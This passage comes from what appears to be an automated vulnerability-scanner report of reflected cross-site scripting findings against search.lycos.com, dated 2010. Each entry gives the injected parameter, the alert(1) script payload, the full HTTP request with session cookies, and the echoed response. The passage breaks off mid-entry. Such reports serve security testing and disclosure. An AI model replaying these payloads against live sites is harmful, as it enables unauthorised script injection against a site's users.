3.124. http://search.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b88f"%3balert(1)//ab61ce09937 was submitted in the cat parameter. This input was echoed as 2b88f";alert(1)//ab61ce09937 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=multi&cat=images2b88f"%3balert(1)//ab61ce09937 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_images2b88f";alert(1)//ab61ce09937";
//-->
...[SNIP]...

3.125. http://search.lycos.com/ [mobile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8ead"><script>alert(1)</script>b7a2c77f357 was submitted in the mobile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357&mobile=1">
...[SNIP]...

3.126. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca07a"><script>alert(1)</script>4cdc20754fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:33 GMT; path=/
Set-Cookie: LYCOS_SEARCH=i4ndl3gvfld9s3lgl65ehmk080; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1&mobile=1">
...[SNIP]...

3.127. http://search.lycos.com/ [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8f5"><script>alert(1)</script>616be4478a0 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:12 GMT; path=/
Set-Cookie: LYCOS_SEARCH=p6laldmb2g7ohngk9ohi37mec0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0&mobile=1">
...[SNIP]...

3.128. http://search.lycos.com/ [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34964"%3balert(1)//0334fee274d was submitted in the query parameter. This input was echoed as 34964";alert(1)//0334fee274d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=web&query=%2734964"%3balert(1)//0334fee274d&x=0&y=0&mobile=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=1; expires=Mon, 12-Dec-2011 14:35:12 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
tab = "web";
offset = 0+1;
query = "'34964";alert(1)//0334fee274d";
not_default = true;
</script>
...[SNIP]...

3.129. http://search.lycos.com/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf21"><script>alert(1)</script>170bf3715a3 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query= HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PARTNER=lycos502bf21%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E170bf3715a3
Set-Cookie: PARTNER=deleted; expires=Sat, 12-Dec-2009 14:35:02 GMT
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query=&mobile=1">
...[SNIP]...

3.130. http://search.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714e4"><script>alert(1)</script>1c8e17eea03 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web714e4"><script>alert(1)</script>1c8e17eea03&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:07 GMT; path=/
Set-Cookie: LYCOS_SEARCH=0roaos6kqiohp2a9qr66pi4uc3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_web714e4"><script>alert(1)</script>1c8e17eea03&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.131. http://search.lycos.com/ [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb19"><script>alert(1)</script>384854fefb5 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:17 GMT; path=/
Set-Cookie: LYCOS_SEARCH=3nnouoedqulhb6jgumc9falmu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0&mobile=1">
...[SNIP]...

3.132. http://search.lycos.com/ [y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427d8"><script>alert(1)</script>ca48fe7296 was submitted in the y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:19 GMT; path=/
Set-Cookie: LYCOS_SEARCH=opld2sr244q0u26cc1hfeg7cj7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296&mobile=1">
...[SNIP]...

3.133. http://search.lycos.com/image/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d10"><script>alert(1)</script>11d3b1192c5 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?tab=multi&cat=imagesb8d10"><script>alert(1)</script>11d3b1192c5 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_imagesb8d10"><script>alert(1)</script>11d3b1192c5&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.134. http://search.lycos.com/image/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67115"%3balert(1)//4e88d6bcb17 was submitted in the cat parameter. This input was echoed as 67115";alert(1)//4e88d6bcb17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /image/?tab=multi&cat=images67115"%3balert(1)//4e88d6bcb17 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_images67115";alert(1)//4e88d6bcb17";
//-->
...[SNIP]...

3.135. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc05"><script>alert(1)</script>f6d897429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?acc05"><script>alert(1)</script>f6d897429=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?acc05"><script>alert(1)</script>f6d897429=1&mobile=1">
...[SNIP]...

3.136. http://search.lycos.com/image/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf1c"><script>alert(1)</script>be82f60f06e was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?tab=multiaaf1c"><script>alert(1)</script>be82f60f06e&cat=images HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

